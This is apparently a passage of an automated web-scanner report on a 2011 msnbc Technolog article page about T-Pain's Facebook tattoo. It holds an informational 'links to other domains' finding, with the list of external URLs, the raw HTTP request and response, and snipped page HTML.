<li><a href="http://blogs.discovermagazine.com/badastronomy/">Bad Astronomy</a>
...[SNIP]...
<li><a href="http://www.collectspace.com/">CollectSpace</a>
...[SNIP]...
<li><a href="http://blogs.discovermagazine.com/cosmicvariance/">Cosmic Variance</a>
...[SNIP]...
<li><a href="http://curmudgeons.blogspot.com/">Curmudgeons Corner</a>
...[SNIP]...
<li><a href="http://news.discovery.com/">Discovery News</a>
...[SNIP]...
<li><a href="http://www.dailygrail.com/">The Daily Grail</a>
...[SNIP]...
<li><a href="http://earthsky.org/">EarthSky</a></li><li><a href="http://www.geekpress.com/">GeekPress</a></li><li><a href="http://www.habitablezone.com/space/">Habitable Zone</a>
...[SNIP]...
<li><a href="http://www.hobbyspace.com/">HobbySpace Log</a>
...[SNIP]...
<li><a href="http://www.livescience.com/">LiveScience</a>
...[SNIP]...
<li><a href="http://blogs.discovermagazine.com/loom/">The Loom</a></li><li><a href="http://www.nasawatch.com/">NASA Watch</a></li><li><a href="http://www.nasaspaceflight.com/">NASA Spaceflight</a>
...[SNIP]...
<li><a href="http://www.outofthecradle.net/">Out of the Cradle</a>
...[SNIP]...
<li><a href="http://www.scidev.net/">SciDev.net</a></li><li><a href="http://www.scienceblog.com/cms/index.php">Science Blog</a>
...[SNIP]...
<li><a href="http://www.scienceblogs.com/">ScienceBlogs</a>
...[SNIP]...
<li><a href="http://www.signonsandiego.com/news/blogs/science-quest/">Science Quest</a>
...[SNIP]...
<li><a href="http://www.scientificamerican.com/blog/observations/">SciAm Observations</a>
...[SNIP]...
<li><a href="http://seedmagazine.com/">Seed Magazine</a>
...[SNIP]...
<li><a href="http://science.slashdot.org">Slashdot Science</a>
...[SNIP]...
<li><a href="http://www.space.com/">Space.com</a></li><li><a href="http://www.spacedaily.com/">Spaceflight Now</a>
...[SNIP]...
<li><a href="http://spacefellowship.com/">Space Fellowship</a>
...[SNIP]...
<li><a href="http://www.thespacereview.com/">The Space Review</a>
...[SNIP]...
<li><a href="http://www.transterrestrial.com/">Transterrestrial Musings</a>
...[SNIP]...
<li><a href="http://http://www.universetoday.com/">Universe Today</a>
...[SNIP]...
<li><a href="http://www.unmannedspaceflight.com">Unmanned Spaceflight</a>
...[SNIP]...
<li><a href="http://trueslant.com/milesobrien/">Uplink by Miles O'Brien</a>
...[SNIP]...
<li><a href="http://planetary.org/blog">Planetary Society Blog</a>
...[SNIP]...
<li><a href="http://www.sciencenews.org/">Science News</a>
...[SNIP]...
<li><a href="http://www.popularmechanics.com/">Popular Mechanics</a>
...[SNIP]...
<li><a href="http://www.popsci.com/">Popular Science</a>
...[SNIP]...
<li><a href="http://news.sciencemag.org/scienceinsider/">Science Insider</a>
...[SNIP]...
<li><a href="http://nasaengineer.com/">NASAEngineer.com</a>
...[SNIP]...
<li><a href="http://eurekalert.org/">EurekAlert</a></li><li><a href="http://blogs.nature.com/news/thegreatbeyond/">Nature: The Great Beyond</a>
...[SNIP]...
<li><a href="http://www.spacedaily.com/">Space Daily</a>
...[SNIP]...
<li><a href="http://www.spacepolitics.com">Space Politics</a>
...[SNIP]...
<div class="rawhtml_contents clearer clearfix rawhtml_BlogAuthorPromo"><a href="http://www.thecaseforpluto.com/" title="The Case for Pluto"><img src="http://www.thecaseforpluto.com/cover.jpg" width="85" height="129" align="left" border="0" style="padding:0 10px 10px 0;" /></a>Alan Boyle's first book tells the story of Pluto's ups and downs as well as the discoveries of other dwarf planets in our own solar system and even more alien worlds beyond. <a href="http://www.thecaseforpluto.com/" title="The Case for Pluto">Buy "The Case for Pluto" ...</a>
...[SNIP]...
<div class="avatar"><a href="http://wbenedetti.newsvine.com/"><img class="noborder" src="http://www.polls.newsvine.com/_vine/images/av/60x60/WBenedetti-689965150.jpg" width="60" height="60" /></a>
...[SNIP]...
<li class="follow winda benedetti on twitter"><a href="http://twitter.com/windabenedetti">follow Winda Benedetti on Twitter</a>
...[SNIP]...
<div class="avatar"><a href="http://toddkenreck.newsvine.com/"><img class="noborder" src="http://www.polls.newsvine.com/_vine/images/av/60x60/toddkenreck-1044151231.jpg" width="60" height="60" /></a>
...[SNIP]...
<li><a href="http://ingame.newsvine.com/">In-Game</a>
...[SNIP]...
<li class="todd kenreck on facebook"><a href="http://www.facebook.com/todd.kenreck">Todd Kenreck on facebook</a>
...[SNIP]...
<li class="todd kenreck on twitter"><a href="https://twitter.com/ToddKenreck">Todd Kenreck on twitter</a>
...[SNIP]...
<div class="avatar"><a href="http://athima-chansanchai.newsvine.com/"><img class="noborder" src="http://www.polls.newsvine.com/_vine/images/av/60x60/athima-chansanchai-1539646533.jpg" width="60" height="60" /></a>
...[SNIP]...
<li><a href="http://redtape.msnbc.com/">Red Tape Chronicles</a>
...[SNIP]...
<a href="http://www.msnbc.redacted/"><img src="http://lib.newsvine.com/chrome/abstractmartinblog/images/msnbc-logo.png" alt="msnbc.com" width="166" height="20"></a>
...[SNIP]...
<li>
                   <a href="http://privacy.microsoft.com/en-us/default.aspx?SU=http://msnbc.redacted/">MSN Privacy</a>
...[SNIP]...
<li>
                   <a href="http://help.live.com/help.aspx?project=tou&mkt=en-us">Legal</a>
...[SNIP]...
</div><link rel="stylesheet" type="text/css" href="http://lib.newsvine.com/Pierre/widgets/wetbar/wetbar.css">
<script type="text/javascript" language="JavaScript">
...[SNIP]...

22.342. http://technolog.msnbc.redacted/_news/2011/01/28/5942663-t-pains-facebook-tattoo-so-hardcore-its-hexacore/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://technolog.msnbc.redacted
Path:	/_news/2011/01/28/5942663-t-pains-facebook-tattoo-so-hardcore-its-hexacore/

Issue detail

The page was loaded from a URL containing a query string:

http://technolog.msnbc.redacted/_news/2011/01/28/5942663-t-pains-facebook-tattoo-so-hardcore-its-hexacore/?GT1=43001

The response contains the following links to other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js
http://alex-johnson.newsvine.com/
http://athima-chansanchai.newsvine.com/
http://biggie2221635.newsvine.com/
http://blogs.discovermagazine.com/badastronomy/
http://blogs.discovermagazine.com/cosmicvariance/
http://blogs.discovermagazine.com/loom/
http://blogs.nature.com/news/thegreatbeyond/
http://boyle.newsvine.com/
http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68
http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F
http://curmudgeons.blogspot.com/
http://darthdon.newsvine.com/
http://dateline.msnbc.com/
http://davethedoubter.newsvine.com/
http://earthsky.org/
http://eurekalert.org/
http://hardball.msnbc.com/
http://helenaspopkin.newsvine.com/
http://help.live.com/help.aspx?project=tou&mkt=en-us
http://http/www.universetoday.com/
http://ingame.newsvine.com/
http://john875667.newsvine.com/
http://lib.newsvine.com/Pierre/widgets/wetbar/wetbar.css
http://lib.newsvine.com/chrome/abstractmartinblog/base.css?v=23247
http://lib.newsvine.com/chrome/abstractmartinblog/chrome.js?v=23247
http://lib.newsvine.com/chrome/abstractmartinblog/images/icons-email.png
http://lib.newsvine.com/chrome/abstractmartinblog/images/icons-feed.png
http://lib.newsvine.com/chrome/abstractmartinblog/images/msnbc-logo.png
http://lib.newsvine.com/chrome/abstractmartinblog/style.css?v=23247
http://lib.newsvine.com/chrome/technolog/style.css?v=23247
http://ljrhodes.newsvine.com/
http://log.newsvine.com/poke.gif?x=0|26&get=c5942663&rand=1003259490&do=msnbc.redacted&rf=http%3A%2F%2Fwww.redacted%2F&ad=53:9:80;44::;56:27:108;53:9:80;86:86:270;87:87:209;50::
http://malexj.tk/6M
http://malexj.wordpress.com/
http://michaelwann.newsvine.com/
http://minotown.newsvine.com/
http://msn.whitepages.com/
http://mtp.msnbc.com/
http://nasaengineer.com/
http://news.discovery.com/
http://news.sciencemag.org/scienceinsider/
http://nightly.msnbc.com/
http://planetary.org/blog
http://platform.twitter.com/widgets.js
http://privacy.microsoft.com/en-us/default.aspx?SU=http://msnbc.redacted/
http://rachel.msnbc.com/
http://redtape.msnbc.com/
http://redtape.newsvine.com/
http://science.slashdot.org/
http://seedmagazine.com/
http://spacefellowship.com/
http://suzanne-choney.newsvine.com/
http://technolog2.newsvine.com/
http://today.msnbc.com/
http://toddkenreck.newsvine.com/
http://trueslant.com/milesobrien/
http://tv.msnbc.com/
http://twitter.com/
http://twitter.com/HelenASPopkin
http://twitter.com/MichaelWann
http://twitter.com/helenaspopkin
http://twitter.com/share
http://twitter.com/windabenedetti
http://twitter.com/wjrothman
http://tyler.newsvine.com/
http://waynej.newsvine.com/
http://wbenedetti.newsvine.com/
http://www.bing.com/
http://www.bing.com/maps/default.aspx?FORM=MSNNAV
http://www.bing.com/shopping?FORM=SHOPH2
http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV
http://www.collectspace.com/
http://www.dailygrail.com/
http://www.delish.com/
http://www.everyblock.com/
http://www.facebook.com/HelenASPopkin
http://www.facebook.com/pages/manage/
http://www.facebook.com/plugins/like.php?layout=button_count&show_faces=false&width=90&action=like&colorscheme=light&href=http://www.facebook.com/pages/Technolog/108546889203630
http://www.facebook.com/plugins/like.php?layout=standard&show_faces=true&width=480&action=recommend&colorscheme=light&href=http://technolog.msnbc.redacted/_news/2011/01/28/5942663-t-pains-facebook-tattoo-so-hardcore-its-hexacore
http://www.facebook.com/todd.kenreck
http://www.geekpress.com/
http://www.habitablezone.com/space/
http://www.hobbyspace.com/
http://www.hotmail.com/
http://www.livescience.com/
http://www.nasaspaceflight.com/
http://www.nasawatch.com/
http://www.newsvine.com/
http://www.newsvine.com/_nv/cms/help/newUsers
http://www.newsvine.com/_nv/cms/info/privacyPolicy
http://www.outofthecradle.net/
http://www.polls.newsvine.com/_static/css/39f49614ef57bfa39918e852b69f13f139a7e311.css?v=23247
http://www.polls.newsvine.com/_static/css/e89cb27add8a8bec4ff014077d76236c84e0ee2e.css?v=23247
http://www.polls.newsvine.com/_static/js/895677dfabd5df38e5ee57c63c4a6f9ac2e2fff9.js?v=23247
http://www.polls.newsvine.com/_static/js/9d030b901f826a71aa88c354332b97d68143daaf.js?v=23247
http://www.polls.newsvine.com/_util/quicktags/v131.js?v=2
http://www.polls.newsvine.com/_util/tiny_mce/tinymce_3_3_9_2/tiny_mce.js
http://www.polls.newsvine.com/_vine/images/_/b_postcomment.gif
http://www.polls.newsvine.com/_vine/images/_/b_posting.gif
http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif
http://www.polls.newsvine.com/_vine/images/_/icon_stop_mini.gif
http://www.polls.newsvine.com/_vine/images/_/icon_track_mini.gif
http://www.polls.newsvine.com/_vine/images/__/spinner.gif
http://www.polls.newsvine.com/_vine/images/av/60x60/WBenedetti-689965150.jpg
http://www.polls.newsvine.com/_vine/images/av/60x60/alex-johnson-743865123.jpg
http://www.polls.newsvine.com/_vine/images/av/60x60/athima-chansanchai-1539646533.jpg
http://www.polls.newsvine.com/_vine/images/av/60x60/boyle-747955448.jpg
http://www.polls.newsvine.com/_vine/images/av/60x60/helenaspopkin-1308146463.jpg
http://www.polls.newsvine.com/_vine/images/av/60x60/michaelwann-318009268.jpg
http://www.polls.newsvine.com/_vine/images/av/60x60/redtape-920134022.jpg
http://www.polls.newsvine.com/_vine/images/av/60x60/suzanne-choney-604078999.jpg
http://www.polls.newsvine.com/_vine/images/av/60x60/toddkenreck-1044151231.jpg
http://www.polls.newsvine.com/_vine/images/av/60x60/wjrothman-1049670252.jpg
http://www.polls.newsvine.com/_vine/images/users/600/helenaspopkin/5942669.jpg
http://www.polls.newsvine.com/_vine/images/users/600/helenaspopkin/5942671.jpg
http://www.polls.newsvine.com/_vine/js/msnbc/s_code.js?v=23247
http://www.polls.newsvine.com/_vine/js/msnbc/std.js?v=23247
http://www.polls.newsvine.com/_vine/js/pierre?v=2643&lib=jquery&addwidgets=zinger,wetbar
http://www.popsci.com/
http://www.popularmechanics.com/
http://www.scidev.net/
http://www.scienceblog.com/cms/index.php
http://www.scienceblogs.com/
http://www.sciencenews.org/
http://www.scientificamerican.com/blog/observations/
http://www.signonsandiego.com/news/blogs/science-quest/
http://www.space.com/
http://www.spacedaily.com/
http://www.spacepolitics.com/
http://www.thecaseforpluto.com/
http://www.thecaseforpluto.com/cover.jpg
http://www.thespacereview.com/
http://www.transterrestrial.com/
http://www.twitter.com/MAlexJohnson
http://www.twitter.com/suzannechoney
http://www.unmannedspaceflight.com/
http://www.youtube.com/v/w0nFpwPuk8E&hl=en_US&fs=1
http://yui.yahooapis.com/combo?2.8.0r4/build/button/assets/skins/sam/button.css&2.8.0r4/build/container/assets/skins/sam/container.css
http://yui.yahooapis.com/combo?2.8.1/build/utilities/utilities.js&2.8.1/build/button/button-min.js&2.8.1/build/container/container-min.js&2.8.1/build/cookie/cookie-min.js&2.8.1/build/selector/selector-min.js&2.8.1/build/event-delegate/event-delegate-min.js&2.8.1/build/json/json-min.js
https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB
https://twitter.com/ToddKenreck
https://www.newsvine.com/_nv/accounts/msnbc/emailAlerts?affiliate=msnbc.redacted

Request

GET /_news/2011/01/28/5942663-t-pains-facebook-tattoo-so-hardcore-its-hexacore/?GT1=43001 HTTP/1.1
Host: technolog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Location: http://technolog.msnbc.redacted/_news/2011/01/28/5942663-t-pains-facebook-tattoo-so-hardcore-its-hexacore?GT1=43001
Content-Type: text/html
Cache-Control: max-age=297
Date: Sun, 30 Jan 2011 01:51:07 GMT
Connection: close

<!DOCTYPE HTML>
<html lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" />
<title>Technolog - T-Pain's Face
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="RSS" href="http://technolog.msnbc.redacted/_feeds/rss2/author" />
<link class="cpk_remote" rel="stylesheet" type="text/css" href="http://yui.yahooapis.com/combo?2.8.0r4/build/button/assets/skins/sam/button.css&2.8.0r4/build/container/assets/skins/sam/container.css" />
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://yui.yahooapis.com/combo?2.8.1/build/utilities/utilities.js&2.8.1/build/button/button-min.js&2.8.1/build/container/container-min.js&2.8.1/build/cookie/cookie-min.js&2.8.1/build/selector/selector-min.js&2.8.1/build/event-delegate/event-delegate-min.js&2.8.1/build/json/json-min.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_util/quicktags/v131.js?v=2"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_util/tiny_mce/tinymce_3_3_9_2/tiny_mce.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_vine/js/pierre?v=2643&lib=jquery&addwidgets=zinger,wetbar"></script>
<link class="cpk_static" rel="stylesheet" type="text/css" href="http://www.polls.newsvine.com/_static/css/39f49614ef57bfa39918e852b69f13f139a7e311.css?v=23247" />
<script class="cpk_static" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_static/js/9d030b901f826a71aa88c354332b97d68143daaf.js?v=23247"></script>
<link class="cpk_dynamic" rel="stylesheet" type="text/css" href="http://www.polls.newsvine.com/_static/css/e89cb27add8a8bec4ff014077d76236c84e0ee2e.css?v=23247" />
<script class="cpk_dynamic" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_static/js/895677dfabd5df38e5ee57c63c4a6f9ac2e2fff9.js?v=23247"></script>
<link class="cpk_chrome" rel="stylesheet" type="text/css" href="http://lib.newsvine.com/chrome/abstractmartinblog/base.css?v=23247" />
<link class="cpk_chrome" rel="stylesheet" type="text/css" href="http://lib.newsvine.com/chrome/abstractmartinblog/style.css?v=23247" />
<link class="cpk_chrome" rel="stylesheet" type="text/css" href="http://lib.newsvine.com/chrome/technolog/style.css?v=23247" />
<script class="cpk_chrome" language="javascript" type="text/javascript" src="http://lib.newsvine.com/chrome/abstractmartinblog/chrome.js?v=23247"></script>
...[SNIP]...
<div class="pokeDiv"><img id="poke" src="http://log.newsvine.com/poke.gif?x=0|26&get=c5942663&rand=1003259490&do=msnbc.redacted&rf=http%3A%2F%2Fwww.redacted%2F&ad=53:9:80;44::;56:27:108;53:9:80;86:86:270;87:87:209;50::" alt="" width="0" height="0" /></div>
...[SNIP]...
<li class="i1 hotmail"><a href="http://www.hotmail.com">Hotmail</a>
...[SNIP]...
<li class="i2 more">
               <a href="http://www.hotmail.com">More</a>
...[SNIP]...
<li class="i7"><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li class="i9"><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li class="i14"><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a>
...[SNIP]...
<li class="i18"><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB" target="_blank">Feedback</a>
...[SNIP]...
<li class="i19"><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV">Maps & Directions</a>
...[SNIP]...
<li class="i20"><a href="http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV ">Travel</a>
...[SNIP]...
<li id="bing" class="i3 bing"><a href="http://www.bing.com"><span>
...[SNIP]...
<li class="i2 show-today"><a href="http://today.msnbc.com/">TODAY</a></li>
           <li class="i3 show-nightly"><a href="http://nightly.msnbc.com/">Nightly News</a>
...[SNIP]...
<li class="i4 show-mtp"><a href="http://mtp.msnbc.com/">Meet the Press</a>
...[SNIP]...
<li class="i5 show-dateline"><a href="http://dateline.msnbc.com/">Dateline</a>
...[SNIP]...
<li class="i6 show-maddow"><a href="http://rachel.msnbc.com/">Maddow</a>
...[SNIP]...
<li class="i8 show-hardball"><a href="http://hardball.msnbc.com/">Hardball</a>
...[SNIP]...
<li class="i9 show-msnbc"><a href="http://tv.msnbc.com/">msnbc tv</a>
...[SNIP]...
<li class="i10 site-newsvine"><a href="http://www.newsvine.com/">Newsvine</a>
...[SNIP]...
<li class="i11 site-everyblock"><a href="http://www.everyblock.com/">EveryBlock</a>
...[SNIP]...
<li class="email_subscribe_option"><a href="https://www.newsvine.com/_nv/accounts/msnbc/emailAlerts?affiliate=msnbc.redacted"><img src="http://lib.newsvine.com/chrome/abstractmartinblog/images/icons-email.png" width="19" height="18" alt="Icons Email"> Receive e-mail updates</a>
...[SNIP]...
</div><a href="https://www.newsvine.com/_nv/accounts/msnbc/emailAlerts?affiliate=msnbc.redacted">change this</a>
...[SNIP]...
<div class="spinner hide"><img src="http://www.polls.newsvine.com/_vine/images/__/spinner.gif" width="16" height="16" alt="Loading" /> Saving...</div>
...[SNIP]...
<a href="http://technolog.msnbc.redacted/_feeds/rss2/author"><img src="http://lib.newsvine.com/chrome/abstractmartinblog/images/icons-feed.png" width="18" height="18" alt="Icons Feed"> Subscribe to RSS</a>
...[SNIP]...
<div class="vine-p vine_data_M2_LayoutPrinter vine_data_M2_FlexiblePrinter p-widgets_FBLike">
<iframe src="http://www.facebook.com/plugins/like.php?layout=button_count&show_faces=false&width=90&action=like&colorscheme=light&href=http://www.facebook.com/pages/Technolog/108546889203630" scrolling="no" frameborder="0" allowTransparency="true" style="border:none; overflow:hidden; width:90px; height:20px"></iframe>
...[SNIP]...

<script src="http://www.polls.newsvine.com/_vine/js/msnbc/std.js?v=23247"></script>
...[SNIP]...
</script><script src="http://www.polls.newsvine.com/_vine/js/msnbc/s_code.js?v=23247"></script>
...[SNIP]...
<div id="vine-inlinePhoto__5942669" data-contentId="5942669" class="inlinePhoto photo_portrait photo_align_block user_inline_photo" style="width:600px;"><img id="helenaspopkin/5942669.jpg" src="http://www.polls.newsvine.com/_vine/images/users/600/helenaspopkin/5942669.jpg" width="600" height="672" alt="" /><p class="photo_credit">
...[SNIP]...
<p>Anyhoo … T-Pain really likes Facebook too … at least his latest tattoo indicates such. The Grammy-winning hip-hop artist shared a picture of his new ink on Twitter today, <a href="http://twitter.com/#!/NBTPAIN/status/30855244816584704">with this explanation </a>
...[SNIP]...
<div id="vine-inlinePhoto__5942671" data-contentId="5942671" class="inlinePhoto photo_portrait photo_align_block user_inline_photo" style="width:238px;"><img id="helenaspopkin/5942671.jpg" src="http://www.polls.newsvine.com/_vine/images/users/600/helenaspopkin/5942671.jpg" width="238" height="320" alt="" />
...[SNIP]...
</param><embed src="http://www.youtube.com/v/w0nFpwPuk8E&hl=en_US&fs=1" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="600" height="429"></embed>
...[SNIP]...
<em>Helen A.S. Popkin writes about the Internet ... a lot. Follow her on <a href="http://twitter.com/helenaspopkin"><span>
...[SNIP]...
</a> and/or <a href="http://www.facebook.com/pages/manage/#!/pages/Helen-AS-Popkin/120508047967128"><span>
...[SNIP]...
<div class="tweetbutton"><a href="http://twitter.com/share" class="twitter-share-button" data-count="horizontal" data-via="msnbc_tech" data-related="breakingnews:The fastest breaking news on Twitter." data-url="http://technolog.msnbc.redacted/_news/2011/01/28/5942663-t-pains-facebook-tattoo-so-hardcore-its-hexacore" data-Text="T-Pain's Facebook tattoo so hardcore, it's hexacore!">Tweet</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
<div class="vine-p vine_data_M2_LayoutPrinter vine_data_M2_FlexiblePrinter p-widgets_FBLike">
<iframe src="http://www.facebook.com/plugins/like.php?layout=standard&show_faces=true&width=480&action=recommend&colorscheme=light&href=http://technolog.msnbc.redacted/_news/2011/01/28/5942663-t-pains-facebook-tattoo-so-hardcore-its-hexacore" scrolling="no" frameborder="0" allowTransparency="true" style="border:none; overflow:hidden; width:480px; height:70px"></iframe>
...[SNIP]...
<div class="normal"><a href="http://biggie2221635.newsvine.com/">biggie-2221635</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="newsvine"><a href="http://tyler.newsvine.com/">tyler</a>
...[SNIP]...
<div class="clearfix"><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /></div>
...[SNIP]...
<div class="normal"><a href="http://waynej.newsvine.com/">waynejohn</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://Davethedoubter.newsvine.com/">Dave the doubter</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://MInOTown.newsvine.com/">M In O Town</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://ljrhodes.newsvine.com/">L.J. Rhodes</a>
...[SNIP]...
<div class="clearfix"><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /></div>
...[SNIP]...
<div class="normal"><a href="http://John875667.newsvine.com/">John-875667</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://Darthdon.newsvine.com/">Darthdon</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="privacytext"><a href="http://www.newsvine.com/_nv/cms/info/privacyPolicy" target="_blank">Newsvine Privacy Statement</a></div><img class="postCommentImage" src="http://www.polls.newsvine.com/_vine/images/_/b_postcomment.gif" /><img class="postingCommentImage" src="http://www.polls.newsvine.com/_vine/images/_/b_posting.gif" /></div>
...[SNIP]...
<div class="newuser">As a new user, you may notice a few temporary content restrictions. <a href="http://www.newsvine.com/_nv/cms/help/newUsers" target="_blank">Click here for more info</a>
...[SNIP]...
<span><img src="http://www.polls.newsvine.com/_vine/images/_/icon_track_mini.gif" width="12" height="12" alt="Start Tracking" title="Add this article to your conversation tracker without commenting on it" />Start Tracking</span>
...[SNIP]...
<span><img src="http://www.polls.newsvine.com/_vine/images/_/icon_stop_mini.gif" width="10" height="10" alt="Stop Tracking" />Stop Tracking</span>
...[SNIP]...
</div><script src="http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68" type="text/javascript"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F" type="text/javascript"></script>
...[SNIP]...
<div class="avatar"><a href="http://michaelwann.newsvine.com/"><img class="noborder" src="http://www.polls.newsvine.com/_vine/images/av/60x60/michaelwann-318009268.jpg" width="60" height="60" /></a>
...[SNIP]...
<li class="twitter"><a href="http://twitter.com/MichaelWann">Follow on Twitter</a>
...[SNIP]...
<div class="avatar"><a href="http://technolog2.newsvine.com/"><img class="noborder" src="http://www.polls.newsvine.com/_vine/images/av/60x60/wjrothman-1049670252.jpg" width="60" height="60" /></a>
...[SNIP]...
from Time and the NYT to the notorious tech blog Gizmodo, where he was features editor for three years. He is not an Apple fanboy, but sometimes he is mistaken for one. You can stalk him on Twitter at <a href="http://twitter.com/wjrothman">@wjrothman</a>
...[SNIP]...
<li class="twitter"><a href="http://twitter.com/wjrothman">Follow on Twitter</a>
...[SNIP]...
<div class="avatar"><a href="http://helenaspopkin.newsvine.com/"><img class="noborder" src="http://www.polls.newsvine.com/_vine/images/av/60x60/helenaspopkin-1308146463.jpg" width="60" height="60" /></a>
...[SNIP]...
<li class="twitter"><a href="http://twitter.com/HelenASPopkin">Follow on Twitter</a>
...[SNIP]...
<li class="facebook"><a href="http://www.facebook.com/HelenASPopkin">Become a fan on Facebook</a>
...[SNIP]...
<div class="avatar"><a href="http://suzanne-choney.newsvine.com/"><img class="noborder" src="http://www.polls.newsvine.com/_vine/images/av/60x60/suzanne-choney-604078999.jpg" width="60" height="60" /></a>
...[SNIP]...
<li class="twitter"><a href="http://www.twitter.com/suzannechoney">Follow on Twitter</a>
...[SNIP]...
<div class="avatar"><a href="http://alex-johnson.newsvine.com/"><img class="noborder" src="http://www.polls.newsvine.com/_vine/images/av/60x60/alex-johnson-743865123.jpg" width="60" height="60" /></a>
...[SNIP]...
<li><a href="http://malexj.wordpress.com/">Editor at Large</a>
...[SNIP]...
<li class="follow on twitter"><a href="http://www.twitter.com/MAlexJohnson">Follow on Twitter</a>
...[SNIP]...
<li class="follow on facebook"><a href="http://malexj.tk/6M">Follow on Facebook</a>
...[SNIP]...
<div class="avatar"><a href="http://redtape.newsvine.com/"><img class="noborder" src="http://www.polls.newsvine.com/_vine/images/av/60x60/redtape-920134022.jpg" width="60" height="60" /></a>
...[SNIP]...
<div class="avatar"><a href="http://boyle.newsvine.com/"><img class="noborder" src="http://www.polls.newsvine.com/_vine/images/av/60x60/boyle-747955448.jpg" width="60" height="60" /></a>
...[SNIP]...
<li><a href="http://blogs.discovermagazine.com/badastronomy/">Bad Astronomy</a>
...[SNIP]...
<li><a href="http://www.collectspace.com/">CollectSpace</a>
...[SNIP]...
<li><a href="http://blogs.discovermagazine.com/cosmicvariance/">Cosmic Variance</a>
...[SNIP]...
<li><a href="http://curmudgeons.blogspot.com/">Curmudgeons Corner</a>
...[SNIP]...
<li><a href="http://news.discovery.com/">Discovery News</a>
...[SNIP]...
<li><a href="http://www.dailygrail.com/">The Daily Grail</a>
...[SNIP]...
<li><a href="http://earthsky.org/">EarthSky</a></li><li><a href="http://www.geekpress.com/">GeekPress</a></li><li><a href="http://www.habitablezone.com/space/">Habitable Zone</a>
...[SNIP]...
<li><a href="http://www.hobbyspace.com/">HobbySpace Log</a>
...[SNIP]...
<li><a href="http://www.livescience.com/">LiveScience</a>
...[SNIP]...
<li><a href="http://blogs.discovermagazine.com/loom/">The Loom</a></li><li><a href="http://www.nasawatch.com/">NASA Watch</a></li><li><a href="http://www.nasaspaceflight.com/">NASA Spaceflight</a>
...[SNIP]...
<li><a href="http://www.outofthecradle.net/">Out of the Cradle</a>
...[SNIP]...
<li><a href="http://www.scidev.net/">SciDev.net</a></li><li><a href="http://www.scienceblog.com/cms/index.php">Science Blog</a>
...[SNIP]...
<li><a href="http://www.scienceblogs.com/">ScienceBlogs</a>
...[SNIP]...
<li><a href="http://www.signonsandiego.com/news/blogs/science-quest/">Science Quest</a>
...[SNIP]...
<li><a href="http://www.scientificamerican.com/blog/observations/">SciAm Observations</a>
...[SNIP]...
